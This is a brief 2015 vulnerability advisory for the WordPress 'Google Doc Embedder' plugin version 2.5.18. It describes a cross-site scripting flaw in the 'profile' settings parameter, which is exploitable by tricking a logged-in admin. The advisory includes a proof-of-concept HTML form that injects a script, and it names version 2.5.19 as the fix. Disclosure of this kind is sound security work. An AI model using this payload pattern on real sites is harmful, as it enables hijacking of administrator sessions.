Title: WordPress 'Google Doc Embedder' plugin - XSS Version: 2.5.18 Author: Morten Nørtoft, Kenneth Jepsen, Mikkel Vej Date: 2015/01/26 Download: https://wordpress.org/plugins/google-document-embedder/ Contacted WordPress: 2015/01/26 ========================================================== ## Description: ========================================================== Lets you embed PDF, MS Office, and many other file types in a web page using the free Google Docs Viewer (no Flash or PDF browser plug-ins required). ## XSS: ========================================================== By tricking a logged in admin into visiting a crafted page, it is possible to perform an XSS attack through the 'profile' parameter. PoC: Log in as admin and submit this form: <form method="POST" action="http://[URL]/wp-admin/options-general.php?page=gde-settings"> <text>action: </text> <input type="text" name="action" value="edit" READONLY><br /> <text>profile: </text> <input type="text" name="profile" value=""><script>alert(1);</script>"><br /> <input type="submit"> </form> ## Solution ========================================================== Update to version 2.5.19.